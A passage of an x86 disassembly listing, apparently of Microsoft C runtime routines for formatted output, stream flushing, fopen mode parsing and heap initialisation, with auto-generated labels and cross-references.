jnz short loc_4185BA
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4186CE
add esp, 10h
loc_4185BA: ; CODE XREF: sub_417F58+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_4186FF
add esp, 10h
test bl, 8
jz short loc_4185EC
test bl, 4
jnz short loc_4185EC
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_4186CE
add esp, 10h
loc_4185EC: ; CODE XREF: sub_417F58+67B�j
; sub_417F58+680�j
cmp [ebp+var_24], 0
jz short loc_418633
cmp [ebp+var_C], 0
jle short loc_418633
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_418601: ; CODE XREF: sub_417F58+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_41DC1B
pop ecx
test eax, eax
pop ecx
jle short loc_418648
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_4186FF
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_418601
jmp short loc_418648
; ---------------------------------------------------------------------------
loc_418633: ; CODE XREF: sub_417F58+698�j
; sub_417F58+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_4186FF
add esp, 10h
loc_418648: ; CODE XREF: sub_417F58+6BC�j
; sub_417F58+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_418660 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4186CE
add esp, 10h
loc_418660: ; CODE XREF: sub_417F58+68�j
; sub_417F58+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_417F84
loc_418671: ; CODE XREF: sub_417F58+1F�j
; sub_417F58+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_417F58 endp
; ---------------------------------------------------------------------------
off_418679 dd offset loc_4180F7 ; DATA XREF: sub_417F58+6E�r
dd offset loc_417FCD ; jump table for switch statement
dd offset loc_417FE8
dd offset loc_418034
dd offset loc_41806B
dd offset loc_418073
dd offset loc_4180A8
dd offset loc_41813B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418699 proc near ; CODE XREF: sub_417F58+1BD�p
; sub_417F58+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_4186B2
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4186BD
; ---------------------------------------------------------------------------
loc_4186B2: ; CODE XREF: sub_418699+9�j
push ecx
push [ebp+arg_0]
call sub_417E43
pop ecx
pop ecx
loc_4186BD: ; CODE XREF: sub_418699+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_4186CA
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4186CA: ; CODE XREF: sub_418699+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_418699 endp
; =============== S U B R O U T I N E =======================================
sub_4186CE proc near ; CODE XREF: sub_417F58+65A�p
; sub_417F58+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_4186FC
mov esi, [esp+8+arg_C]
loc_4186DF: ; CODE XREF: sub_4186CE+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_418699
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_4186FC
mov eax, edi
dec edi
test eax, eax
jg short loc_4186DF
loc_4186FC: ; CODE XREF: sub_4186CE+B�j
; sub_4186CE+25�j
pop edi
pop esi
retn
sub_4186CE endp
; =============== S U B R O U T I N E =======================================
sub_4186FF proc near ; CODE XREF: sub_417F58+670�p
; sub_417F58+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_418733
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_418715: ; CODE XREF: sub_4186FF+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_418699
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_418733
mov eax, ebx
dec ebx
test eax, eax
jg short loc_418715
loc_418733: ; CODE XREF: sub_4186FF+C�j
; sub_4186FF+2B�j
pop edi
pop esi
pop ebx
retn
sub_4186FF endp
; =============== S U B R O U T I N E =======================================
sub_418737 proc near ; CODE XREF: sub_417F58+E5�p
; sub_417F58+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_418737 endp
; =============== S U B R O U T I N E =======================================
sub_418744 proc near ; CODE XREF: sub_417F58+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_418744 endp
; =============== S U B R O U T I N E =======================================
sub_418754 proc near ; CODE XREF: sub_417F58+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_418754 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418762 proc near ; CODE XREF: sub_415964+17�p
; sub_415964+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_418780
mov ecx, ds:off_42F360
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4187D2
; ---------------------------------------------------------------------------
loc_418780: ; CODE XREF: sub_418762+10�j
mov ecx, eax
push esi
mov esi, ds:off_42F360
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4187A5
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_4187AE
; ---------------------------------------------------------------------------
loc_4187A5: ; CODE XREF: sub_418762+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_4187AE: ; CODE XREF: sub_418762+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41DC83
add esp, 1Ch
test eax, eax
jnz short loc_4187CE
leave
retn
; ---------------------------------------------------------------------------
loc_4187CE: ; CODE XREF: sub_418762+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4187D2: ; CODE XREF: sub_418762+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_418762 endp
; =============== S U B R O U T I N E =======================================
sub_4187D7 proc near ; CODE XREF: sub_415AD0+2A�p
; sub_41DFE6+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, ds:dword_4CA4C0
jnb loc_418871
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4CA3C0h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_418871
push edi
call sub_41DF52
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_418850
cmp edi, 1
jz short loc_41881E
cmp edi, 2
jnz short loc_418834
loc_41881E: ; CODE XREF: sub_4187D7+40�j
push 2
call sub_41DF52
push 1
mov ebp, eax
call sub_41DF52
pop ecx
cmp eax, ebp
pop ecx
jz short loc_418850
loc_418834: ; CODE XREF: sub_4187D7+45�j
push edi
call sub_41DF52
pop ecx
push eax
call ds:off_422074
test eax, eax
jnz short loc_418850
call ds:dword_42206C ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_418852
; ---------------------------------------------------------------------------
loc_418850: ; CODE XREF: sub_4187D7+3B�j
; sub_4187D7+5B�j ...
xor ebp, ebp
loc_418852: ; CODE XREF: sub_4187D7+77�j
push edi
call sub_41DED8
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41886D
push ebp
call sub_41D064
pop ecx
jmp short loc_418882
; ---------------------------------------------------------------------------
loc_41886D: ; CODE XREF: sub_4187D7+8B�j
xor eax, eax
jmp short loc_418885
; ---------------------------------------------------------------------------
loc_418871: ; CODE XREF: sub_4187D7+E�j
; sub_4187D7+2F�j
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 9
loc_418882: ; CODE XREF: sub_4187D7+94�j
or eax, 0FFFFFFFFh
loc_418885: ; CODE XREF: sub_4187D7+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4187D7 endp
; =============== S U B R O U T I N E =======================================
sub_41888A proc near ; CODE XREF: sub_415AD0+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_4188B3
test al, 8
jz short loc_4188B3
push dword ptr [esi+8]
call sub_415DE1
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_4188B3: ; CODE XREF: sub_41888A+A�j
; sub_41888A+E�j
pop esi
retn
sub_41888A endp
; =============== S U B R O U T I N E =======================================
sub_4188B5 proc near ; CODE XREF: sub_418955+2D�p
; sub_418955+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_4188C7
push esi
call sub_418955
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4188C7: ; CODE XREF: sub_4188B5+7�j
push esi
call sub_4188F0
test eax, eax
pop ecx
jz short loc_4188D7
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4188D7: ; CODE XREF: sub_4188B5+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_4188EC
push dword ptr [esi+10h]
call sub_41DF8F
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_4188EC: ; CODE XREF: sub_4188B5+26�j
xor eax, eax
pop esi
retn
sub_4188B5 endp
; =============== S U B R O U T I N E =======================================
sub_4188F0 proc near ; CODE XREF: sub_415AD0+1A�p
; sub_416E2E+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41893D
test ax, 108h
jz short loc_41893D
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41893D
push edi
push eax
push dword ptr [esi+10h]
call sub_41CEB7
add esp, 0Ch
cmp eax, edi
jnz short loc_418936
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41893D
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41893D
; ---------------------------------------------------------------------------
loc_418936: ; CODE XREF: sub_4188F0+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41893D: ; CODE XREF: sub_4188F0+14�j
; sub_4188F0+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4188F0 endp
; =============== S U B R O U T I N E =======================================
sub_41894C proc near ; CODE XREF: _0:loc_41DC07�p
push 1
call sub_418955
pop ecx
retn
sub_41894C endp
; =============== S U B R O U T I N E =======================================
sub_418955 proc near ; CODE XREF: sub_4188B5+A�p
; sub_41894C+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp ds:dword_4CA3A0, esi
jle short loc_4189B3
loc_418966: ; CODE XREF: sub_418955+5C�j
mov eax, ds:dword_4C9380
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4189AA
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_4189AA
cmp [esp+0Ch+arg_0], 1
jnz short loc_418990
push eax
call sub_4188B5
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4189AA
inc ebx
jmp short loc_4189AA
; ---------------------------------------------------------------------------
loc_418990: ; CODE XREF: sub_418955+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_4189AA
test cl, 2
jz short loc_4189AA
push eax
call sub_4188B5
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4189AA
or edi, eax
loc_4189AA: ; CODE XREF: sub_418955+1B�j
; sub_418955+23�j ...
inc esi
cmp esi, ds:dword_4CA3A0
jl short loc_418966
loc_4189B3: ; CODE XREF: sub_418955+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_4189BE
mov eax, edi
loc_4189BE: ; CODE XREF: sub_418955+65�j
pop edi
pop esi
pop ebx
retn
sub_418955 endp
; =============== S U B R O U T I N E =======================================
sub_4189C2 proc near ; CODE XREF: sub_415B26+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41DB3C
test eax, eax
pop ecx
jz short loc_418A4B
cmp esi, offset dword_431A98
jnz short loc_4189E0
xor eax, eax
jmp short loc_4189EB
; ---------------------------------------------------------------------------
loc_4189E0: ; CODE XREF: sub_4189C2+18�j
cmp esi, offset dword_431AB8
jnz short loc_418A4B
push 1
pop eax
loc_4189EB: ; CODE XREF: sub_4189C2+1C�j
inc ds:dword_4C9248
test word ptr [esi+0Ch], 10Ch
jnz short loc_418A4B
cmp ds:dword_4C90DC[eax*4], 0
push ebx
push edi
lea edi, ds:4C90DCh[eax*4]
mov ebx, 1000h
jnz short loc_418A31
push ebx
call sub_415D2F
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_418A31
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_418A3E
; ---------------------------------------------------------------------------
loc_418A31: ; CODE XREF: sub_4189C2+4D�j
; sub_4189C2+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_418A3E: ; CODE XREF: sub_4189C2+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_418A4B: ; CODE XREF: sub_4189C2+10�j
; sub_4189C2+24�j ...
xor eax, eax
pop esi
retn
sub_4189C2 endp
; =============== S U B R O U T I N E =======================================
sub_418A4F proc near ; CODE XREF: sub_415B26+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_418A79
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_418A8A
push esi
call sub_4188F0
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_418A79: ; CODE XREF: sub_418A4F+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_418A8A
push eax
call sub_4188F0
pop ecx
loc_418A8A: ; CODE XREF: sub_418A4F+10�j
; sub_418A4F+32�j
pop esi
retn
sub_418A4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A8C proc near ; CODE XREF: sub_415B58+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:dword_4C9250
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_418AC5
cmp al, 72h
jz short loc_418ABE
cmp al, 77h
jnz loc_418BD9
mov ecx, 301h
jmp short loc_418ACA
; ---------------------------------------------------------------------------
loc_418ABE: ; CODE XREF: sub_418A8C+21�j
xor ecx, ecx
or esi, 1
jmp short loc_418ACD
; ---------------------------------------------------------------------------
loc_418AC5: ; CODE XREF: sub_418A8C+1D�j
mov ecx, 109h
loc_418ACA: ; CODE XREF: sub_418A8C+30�j
or esi, 2
loc_418ACD: ; CODE XREF: sub_418A8C+37�j
push 1
pop edx
loc_418AD0: ; CODE XREF: sub_418A8C+8B�j
; sub_418A8C+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_418BBF
cmp edx, ebx
jz loc_418BBF
movsx eax, al
cmp eax, 54h
jg short loc_418B5E
jz short loc_418B4E
sub eax, 2Bh
jz short loc_418B38
sub eax, 19h
jz short loc_418B2E
sub eax, 0Eh
jz short loc_418B19
dec eax
jnz loc_418BB0
cmp [ebp+var_4], ebx
jnz loc_418BB0
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_418AD0
; ---------------------------------------------------------------------------
loc_418B19: ; CODE XREF: sub_418A8C+6F�j
cmp [ebp+var_4], ebx
jnz loc_418BB0
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_418AD0
; ---------------------------------------------------------------------------
loc_418B2E: ; CODE XREF: sub_418A8C+6A�j
test cl, 40h
jnz short loc_418BB0
or ecx, 40h
jmp short loc_418AD0
; ---------------------------------------------------------------------------
loc_418B38: ; CODE XREF: sub_418A8C+65�j
test cl, 2
jnz short loc_418BB0
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_418AD0
; ---------------------------------------------------------------------------
loc_418B4E: ; CODE XREF: sub_418A8C+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_418BB0
or ecx, eax
jmp loc_418AD0
; ---------------------------------------------------------------------------
loc_418B5E: ; CODE XREF: sub_418A8C+5E�j
sub eax, 62h
jz short loc_418BAB
dec eax
jz short loc_418B94
sub eax, 0Bh
jz short loc_418B7D
sub eax, 6
jnz short loc_418BB0
test ch, 0C0h
jnz short loc_418BB0
or ch, 40h
jmp loc_418AD0
; ---------------------------------------------------------------------------
loc_418B7D: ; CODE XREF: sub_418A8C+DD�j
cmp [ebp+var_8], ebx
jnz short loc_418BB0
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_418AD0
; ---------------------------------------------------------------------------
loc_418B94: ; CODE XREF: sub_418A8C+D8�j
cmp [ebp+var_8], ebx
jnz short loc_418BB0
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_418AD0
; ---------------------------------------------------------------------------
loc_418BAB: ; CODE XREF: sub_418A8C+D5�j
test ch, 0C0h
jz short loc_418BB7
loc_418BB0: ; CODE XREF: sub_418A8C+72�j
; sub_418A8C+7B�j ...
xor edx, edx
jmp loc_418AD0
; ---------------------------------------------------------------------------
loc_418BB7: ; CODE XREF: sub_418A8C+122�j
or ch, 80h
jmp loc_418AD0
; ---------------------------------------------------------------------------
loc_418BBF: ; CODE XREF: sub_418A8C+4A�j
; sub_418A8C+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41DFE6
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_418BDD
loc_418BD9: ; CODE XREF: sub_418A8C+25�j
xor eax, eax
jmp short loc_418BF7
; ---------------------------------------------------------------------------
loc_418BDD: ; CODE XREF: sub_418A8C+14B�j
mov eax, [ebp+arg_C]
inc ds:dword_4C9248
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_418BF7: ; CODE XREF: sub_418A8C+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_418A8C endp
; =============== S U B R O U T I N E =======================================
sub_418BFC proc near ; CODE XREF: sub_415B58�p
mov edx, ds:dword_4CA3A0
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_418C6D
mov ebx, ds:dword_4C9380
mov edi, ebx
loc_418C18: ; CODE XREF: sub_418BFC+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_418C33
test byte ptr [ecx+0Ch], 83h
jz short loc_418C2E
inc eax
add edi, 4
cmp eax, edx
jl short loc_418C18
jmp short loc_418C6D
; ---------------------------------------------------------------------------
loc_418C2E: ; CODE XREF: sub_418BFC+26�j
mov esi, [ebx+eax*4]
jmp short loc_418C57
; ---------------------------------------------------------------------------
loc_418C33: ; CODE XREF: sub_418BFC+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_415D2F
pop ecx
mov ecx, ds:dword_4C9380
mov [edi+ecx], eax
mov eax, ds:dword_4C9380
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_418C6D
mov esi, edi
loc_418C57: ; CODE XREF: sub_418BFC+35�j
cmp esi, ebp
jz short loc_418C6D
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_418C6D: ; CODE XREF: sub_418BFC+12�j
; sub_418BFC+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418BFC endp
; =============== S U B R O U T I N E =======================================
sub_418C74 proc near ; CODE XREF: sub_415D41+1F�p
; sub_41756F+126�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4C90E8
test eax, eax
jz short loc_418C8C
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_418C8C
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_418C8C: ; CODE XREF: sub_418C74+7�j
; sub_418C74+12�j
xor eax, eax
retn
sub_418C74 endp
; =============== S U B R O U T I N E =======================================
sub_418C8F proc near ; CODE XREF: sub_418CBC+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call ds:off_4220E0
cmp word ptr [eax], 5A4Dh
jnz short loc_418CBA
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_418CBA
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_418CBA: ; CODE XREF: sub_418C8F+15�j
; sub_418C8F+1C�j
pop esi
retn
sub_418C8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418CBC proc near ; CODE XREF: sub_418E04+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_415D00
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call ds:dword_422124 ; GetVersionExA
test eax, eax
jz short loc_418CFF
cmp [ebp+var_88], 2
jnz short loc_418CFF
cmp [ebp+var_94], 5
jb short loc_418CFF
push 1
pop eax
jmp loc_418E01
; ---------------------------------------------------------------------------
loc_418CFF: ; CODE XREF: sub_418CBC+27�j
; sub_418CBC+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_42218C ; GetEnvironmentVariableA
test eax, eax
jz loc_418DEE
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_418D41
loc_418D2E: ; CODE XREF: sub_418CBC+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_418D3C
cmp al, 7Ah
jg short loc_418D3C
sub al, 20h
mov [ecx], al
loc_418D3C: ; CODE XREF: sub_418CBC+76�j
; sub_418CBC+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_418D2E
loc_418D41: ; CODE XREF: sub_418CBC+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_416EC0
add esp, 0Ch
test eax, eax
jnz short loc_418D63
lea eax, [ebp+var_122C]
jmp short loc_418DAC
; ---------------------------------------------------------------------------
loc_418D63: ; CODE XREF: sub_418CBC+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call ds:off_422060
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_418D97
loc_418D84: ; CODE XREF: sub_418CBC+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_418D92
cmp al, 7Ah
jg short loc_418D92
sub al, 20h
mov [ecx], al
loc_418D92: ; CODE XREF: sub_418CBC+CC�j
; sub_418CBC+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_418D84
loc_418D97: ; CODE XREF: sub_418CBC+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_415A50
pop ecx
pop ecx
loc_418DAC: ; CODE XREF: sub_418CBC+A5�j
cmp eax, ebx
jz short loc_418DEE
push 2Ch
push eax
call sub_417070
pop ecx
cmp eax, ebx
pop ecx
jz short loc_418DEE
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_418DD3
loc_418DC5: ; CODE XREF: sub_418CBC+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_418DCE
mov [ecx], bl
jmp short loc_418DCF
; ---------------------------------------------------------------------------
loc_418DCE: ; CODE XREF: sub_418CBC+10C�j
inc ecx
loc_418DCF: ; CODE XREF: sub_418CBC+110�j
cmp [ecx], bl
jnz short loc_418DC5
loc_418DD3: ; CODE XREF: sub_418CBC+107�j
push 0Ah
push ebx
push eax
call sub_416861
add esp, 0Ch
cmp eax, 2
jz short loc_418E01
cmp eax, 3
jz short loc_418E01
cmp eax, 1
jz short loc_418E01
loc_418DEE: ; CODE XREF: sub_418CBC+5C�j
; sub_418CBC+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_418C8F
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_418E01: ; CODE XREF: sub_418CBC+3E�j
; sub_418CBC+126�j ...
pop ebx
leave
retn
sub_418CBC endp
; =============== S U B R O U T I N E =======================================
sub_418E04 proc near ; CODE XREF: _0:00417D5E�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_422194 ; HeapCreate
test eax, eax
mov ds:dword_4CA704, eax
jz short loc_418E5A
call sub_418CBC
cmp eax, 3
mov ds:dword_4CA708, eax
jnz short loc_418E40
push 3F8h
call sub_418E61
pop ecx
jmp short loc_418E4A
; ---------------------------------------------------------------------------
loc_418E40: ; CODE XREF: sub_418E04+2D�j
cmp eax, 2
jnz short loc_418E5D
call sub_4199A8
loc_418E4A: ; CODE XREF: sub_418E04+3A�j
test eax, eax
jnz short loc_418E5D
push ds:dword_4CA704
call ds:dword_422190 ; HeapDestroy
loc_418E5A: ; CODE XREF: sub_418E04+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_418E5D: ; CODE XREF: sub_418E04+3F�j
; sub_418E04+48�j
push 1
pop eax
retn
sub_418E04 endp
; =============== S U B R O U T I N E =======================================
sub_418E61 proc near ; CODE XREF: sub_418E04+34�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_4CA704
call ds:dword_4220C8 ; RtlAllocateHeap
test eax, eax
mov ds:dword_4CA6FC, eax
jnz short loc_418E7E
retn
; ---------------------------------------------------------------------------
loc_418E7E: ; CODE XREF: sub_418E61+1A�j
mov ecx, [esp+arg_0]
and ds:dword_4CA6F4, 0
and ds:dword_4CA6F8, 0
push 1
mov ds:dword_4CA6F0, eax
mov ds:dword_4CA700, ecx
mov ds:dword_4CA6E8, 10h
pop eax
retn
sub_418E61 endp
; =============== S U B R O U T I N E =======================================
sub_418EA9 proc near ; CODE XREF: sub_415DE1+17�p
; sub_41756F+4C�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4CA6F8
lea ecx, [eax+eax*4]
mov eax, ds:dword_4CA6FC
lea ecx, [eax+ecx*4]
loc_418EB9: ; CODE XREF: sub_418EA9+26�j
cmp eax, ecx
jnb short loc_418ED1
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_418ED3
add eax, 14h
jmp short loc_418EB9
; ---------------------------------------------------------------------------
loc_418ED1: ; CODE XREF: sub_418EA9+12�j
xor eax, eax
locret_418ED3: ; CODE XREF: sub_418EA9+21�j
retn
sub_418EA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418ED4 proc near ; CODE XREF: sub_415DE1+23�p
; sub_41756F+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
